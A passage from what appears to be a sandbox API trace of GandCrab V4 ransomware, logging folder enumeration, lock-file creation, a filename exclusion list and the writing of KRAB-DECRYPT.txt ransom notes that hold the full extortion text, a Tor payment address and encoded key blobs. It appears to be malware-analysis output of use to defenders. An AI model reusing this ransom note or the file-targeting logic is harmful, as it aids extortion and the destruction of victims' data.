lpFileSystemFlags=0x2f30604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0062.119] wsprintfW (in: param_1=0x2ea0000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Speech\\d2ca4a08d2ca4dee3d.lock") returned 78 [0062.119] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Speech\\d2ca4a08d2ca4dee3d.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\speech\\d2ca4a08d2ca4dee3d.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x3ac [0062.120] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0062.120] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0062.120] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Speech\\") returned 55 [0062.121] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Speech\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Speech\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Speech\\*" [0062.121] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Speech\\*", lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 0xfbd1e0 [0062.121] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0062.121] FindNextFileW (in: hFindFile=0xfbd1e0, lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 1 [0062.121] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0062.121] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0062.121] FindNextFileW (in: hFindFile=0xfbd1e0, lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 1 [0062.121] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2=".") returned 1 [0062.121] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2="..") returned 1 [0062.121] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Speech\\", lpString2="d2ca4a08d2ca4dee3d.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Speech\\d2ca4a08d2ca4dee3d.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Speech\\d2ca4a08d2ca4dee3d.lock" [0062.121] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0062.121] wsprintfW (in: param_1=0x2ea0000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Speech\\d2ca4a08d2ca4dee3d.lock.KRAB") returned 83 [0062.121] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Speech\\d2ca4a08d2ca4dee3d.lock") returned 78 [0062.122] lstrlenW (lpString=".lock") returned 5 [0062.122] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0062.122] wsprintfW (in: param_1=0x2f30000, param_2="%s " | out: param_1=".lock ") returned 6 [0062.122] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0062.122] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0062.123] FindNextFileW (in: hFindFile=0xfbd1e0, lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 1 [0062.123] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2=".") returned 1 [0062.123] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2="..") returned 1 [0062.123] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Speech\\", lpString2="KRAB-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Speech\\KRAB-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Speech\\KRAB-DECRYPT.txt" [0062.123] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0062.123] wsprintfW (in: param_1=0x2ea0000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Speech\\KRAB-DECRYPT.txt.KRAB") returned 76 [0062.123] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Speech\\KRAB-DECRYPT.txt") returned 71 [0062.123] lstrlenW (lpString=".txt") returned 4 [0062.123] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0062.123] wsprintfW (in: param_1=0x2f30000, param_2="%s " | out: param_1=".txt ") returned 5 [0062.124] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0062.124] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Speech\\KRAB-DECRYPT.txt") returned 71 [0062.124] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Speech\\KRAB-DECRYPT.txt") returned 71 [0062.124] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0062.124] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0062.124] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat") returned -1 [0062.124] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0062.124] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0062.124] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="boot.ini") returned 1 [0062.124] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat.log") returned -1 [0062.124] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="thumbs.db") returned -1 [0062.124] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.html") returned 1 [0062.124] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.txt") returned 0 [0062.124] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0062.125] FindNextFileW (in: hFindFile=0xfbd1e0, lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 0 [0062.125] FindClose (in: hFindFile=0xfbd1e0 | out: hFindFile=0xfbd1e0) returned 1 [0062.125] CloseHandle (hObject=0x3ac) returned 1 [0062.125] FindNextFileW (in: hFindFile=0xfbd560, lpFindFileData=0x338ed50 | out: lpFindFileData=0x338ed50) returned 1 [0062.125] lstrcmpW (lpString1="SystemCertificates", lpString2=".") returned 1 [0062.125] lstrcmpW (lpString1="SystemCertificates", lpString2="..") returned 1 [0062.125] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\", lpString2="SystemCertificates" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates" [0062.125] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\" [0062.125] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x2ea0000 [0062.126] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0062.126] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0062.126] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0062.126] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0062.126] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0062.126] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0062.126] wsprintfW (in: param_1=0x2ea0200, param_2="%s\\KRAB-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\\\KRAB-DECRYPT.txt") returned 84 [0062.127] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\\\KRAB-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\systemcertificates\\krab-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ac [0062.127] lstrlenW (lpString="---= GANDCRAB V4 =--- \r\r\n\r\r\nAttention! \r\r\nAll your files, documents, photos, databases and other important files are encrypted and have the extension: .KRAB \r\r\nThe only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files.\r\n\r\r\nThe server with your key is in a closed network TOR. You can get there by the following ways:\r\n\r\n----------------------------------------------------------------------------------------\r\r\n| 0. Download Tor browser - https://www.torproject.org/ \r\r\n| 1. Install Tor browser \r\n| 2. Open Tor Browser \r\n| 3. Open link in TOR browser: http://gandcrabmfe6mnef.onion/dce1bb8bd2ca4def \r\n| 4. Follow the instructions on this page \r\r\n---------------------------------------------------------------------------------------- \r\n \r\r\nOn our page you will see instructions on payment and get the opportunity to decrypt 1 file for free. \r\r\n\r\nATTENTION!\r\r\nIN ORDER TO PREVENT DATA DAMAGE:\r\n\r\n* DO NOT MODIFY ENCRYPTED FILES\r\n* DO NOT CHANGE DATA BELOW\r\n\r\n---BEGIN GANDCRAB KEY---\r\n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\r\n---END GANDCRAB KEY---\r\n\r\n---BEGIN PC DATA---\r\nwfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=\r\n---END PC DATA---") returned 4023 [0062.127] WriteFile (in: hFile=0x3ac, lpBuffer=0x2f20000*, nNumberOfBytesToWrite=0x1f6e, lpNumberOfBytesWritten=0x338eaa0, lpOverlapped=0x0 | out: lpBuffer=0x2f20000*, lpNumberOfBytesWritten=0x338eaa0*=0x1f6e, lpOverlapped=0x0) returned 1 [0062.128] CloseHandle (hObject=0x3ac) returned 1 [0062.128] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0062.129] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0062.129] GetSystemTime (in: lpSystemTime=0x2ea0400 | out: lpSystemTime=0x2ea0400*(wYear=0x7e2, wMonth=0x7, wDayOfWeek=0x4, wDay=0x5, wHour=0xd, wMinute=0x2d, wSecond=0x9, wMilliseconds=0x141)) [0062.129] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0062.129] GetWindowsDirectoryW (in: lpBuffer=0x2f30000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0062.129] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2f30200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2f30600, lpMaximumComponentLength=0x2f30608, lpFileSystemFlags=0x2f30604, lpFileSystemNameBuffer=0x2f30400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2f30600*=0xd2ca4def, lpMaximumComponentLength=0x2f30608*=0xff, lpFileSystemFlags=0x2f30604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0062.130] wsprintfW (in: param_1=0x2ea0000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\d2ca4a08d2ca4dee3d.lock") returned 90 [0062.130] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\d2ca4a08d2ca4dee3d.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\systemcertificates\\d2ca4a08d2ca4dee3d.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x3ac [0062.132] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0062.132] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0062.133] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\") returned 67 [0062.133] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\*" [0062.133] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\*", lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 0xfbd1e0 [0062.133] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0062.133] FindNextFileW (in: hFindFile=0xfbd1e0, lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 1 [0062.133] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0062.133] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0062.133] FindNextFileW (in: hFindFile=0xfbd1e0, lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 1 [0062.133] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2=".") returned 1 [0062.133] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2="..") returned 1 [0062.133] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\", lpString2="d2ca4a08d2ca4dee3d.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\d2ca4a08d2ca4dee3d.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\d2ca4a08d2ca4dee3d.lock" [0062.133] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0062.134] wsprintfW (in: param_1=0x2ea0000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\d2ca4a08d2ca4dee3d.lock.KRAB") returned 95 [0062.134] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\d2ca4a08d2ca4dee3d.lock") returned 90 [0062.134] lstrlenW (lpString=".lock") returned 5 [0062.134] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0062.134] wsprintfW (in: param_1=0x2f30000, param_2="%s " | out: param_1=".lock ") returned 6 [0062.134] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0062.134] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0062.135] FindNextFileW (in: hFindFile=0xfbd1e0, lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 1 [0062.135] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2=".") returned 1 [0062.135] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2="..") returned 1 [0062.135] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\", lpString2="KRAB-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\KRAB-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\KRAB-DECRYPT.txt" [0062.135] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0062.135] wsprintfW (in: param_1=0x2ea0000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\KRAB-DECRYPT.txt.KRAB") returned 88 [0062.135] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\KRAB-DECRYPT.txt") returned 83 [0062.135] lstrlenW (lpString=".txt") returned 4 [0062.135] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0062.136] wsprintfW (in: param_1=0x2f30000, param_2="%s " | out: param_1=".txt ") returned 5 [0062.136] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0062.136] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\KRAB-DECRYPT.txt") returned 83 [0062.136] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\KRAB-DECRYPT.txt") returned 83 [0062.136] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0062.136] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0062.136] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat") returned -1 [0062.136] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0062.136] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0062.136] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="boot.ini") returned 1 [0062.136] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat.log") returned -1 [0062.136] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="thumbs.db") returned -1 [0062.136] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.html") returned 1 [0062.136] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.txt") returned 0 [0062.136] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0062.137] FindNextFileW (in: hFindFile=0xfbd1e0, lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 1 [0062.137] lstrcmpW (lpString1="My", lpString2=".") returned 1 [0062.137] lstrcmpW (lpString1="My", lpString2="..") returned 1 [0062.137] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\", lpString2="My" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My" [0062.137] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\" [0062.137] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x2ea0000 [0062.137] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0062.137] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0062.137] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0062.137] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0062.137] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0062.138] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0062.138] wsprintfW (in: param_1=0x2ea0200, param_2="%s\\KRAB-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\\\KRAB-DECRYPT.txt") returned 87 [0062.138] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\\\KRAB-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\systemcertificates\\my\\krab-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x440 [0062.140] lstrlenW (lpString="---= GANDCRAB V4 =--- \r\r\n\r\r\nAttention! \r\r\nAll your files, documents, photos, databases and other important files are encrypted and have the extension: .KRAB \r\r\nThe only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files.\r\n\r\r\nThe server with your key is in a closed network TOR. You can get there by the following ways:\r\n\r\n----------------------------------------------------------------------------------------\r\r\n| 0. Download Tor browser - https://www.torproject.org/ \r\r\n| 1. Install Tor browser \r\n| 2. Open Tor Browser \r\n| 3. Open link in TOR browser: http://gandcrabmfe6mnef.onion/dce1bb8bd2ca4def \r\n| 4. Follow the instructions on this page \r\r\n---------------------------------------------------------------------------------------- \r\n \r\r\nOn our page you will see instructions on payment and get the opportunity to decrypt 1 file for free. \r\r\n\r\nATTENTION!\r\r\nIN ORDER TO PREVENT DATA DAMAGE:\r\n\r\n* DO NOT MODIFY ENCRYPTED FILES\r\n* DO NOT CHANGE DATA BELOW\r\n\r\n---BEGIN GANDCRAB 